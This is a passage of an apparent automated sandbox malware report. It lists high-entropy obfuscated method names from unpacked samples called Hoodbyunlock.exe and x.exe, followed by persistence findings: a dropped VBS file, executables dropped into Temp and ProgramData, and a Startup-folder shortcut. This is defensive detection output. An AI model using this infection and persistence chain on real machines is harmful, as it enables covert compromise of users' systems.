                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csHigh entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, GXHRyrck0HnRoIRVg.csHigh entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, 8oKYND99avZqdoU5T.csHigh entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, y9w99ZmeIXuttmqO5.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
                      Source: Hoodbyunlock.exe.7.dr, ZdLTnuqgOY3k2FQWh.csHigh entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: Hoodbyunlock.exe.7.dr, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: Hoodbyunlock.exe.7.dr, GVhN53QgxWl6tpiCd.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: Hoodbyunlock.exe.7.dr, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.csHigh entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.csHigh entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: Hoodbyunlock.exe.7.dr, UAKhR7NJbD3KWn0Nd.csHigh entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: Hoodbyunlock.exe.7.dr, ktUwZuVPUn1uLnrpF.csHigh entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: Hoodbyunlock.exe.7.dr, bRv5O3fSB18gLSRt9.csHigh entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: Hoodbyunlock.exe.7.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csHigh entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: Hoodbyunlock.exe.7.dr, GXHRyrck0HnRoIRVg.csHigh entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: Hoodbyunlock.exe.7.dr, 8oKYND99avZqdoU5T.csHigh entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: Hoodbyunlock.exe.7.dr, y9w99ZmeIXuttmqO5.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, ZdLTnuqgOY3k2FQWh.csHigh entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, GVhN53QgxWl6tpiCd.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.csHigh entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.csHigh entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, UAKhR7NJbD3KWn0Nd.csHigh entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, ktUwZuVPUn1uLnrpF.csHigh entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, bRv5O3fSB18gLSRt9.csHigh entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csHigh entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, GXHRyrck0HnRoIRVg.csHigh entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, 8oKYND99avZqdoU5T.csHigh entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, y9w99ZmeIXuttmqO5.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'

                      Persistence and Installation Behavior

                      barindex
                      Command shell drops VBS files
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\x.vbsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\ProgramData\Hoodbyunlock.exeJump to dropped file
                      Source: C:\Windows\System32\cscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\ProgramData\Hoodbyunlock.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hoodbyunlock.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hoodbyunlock.lnkJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
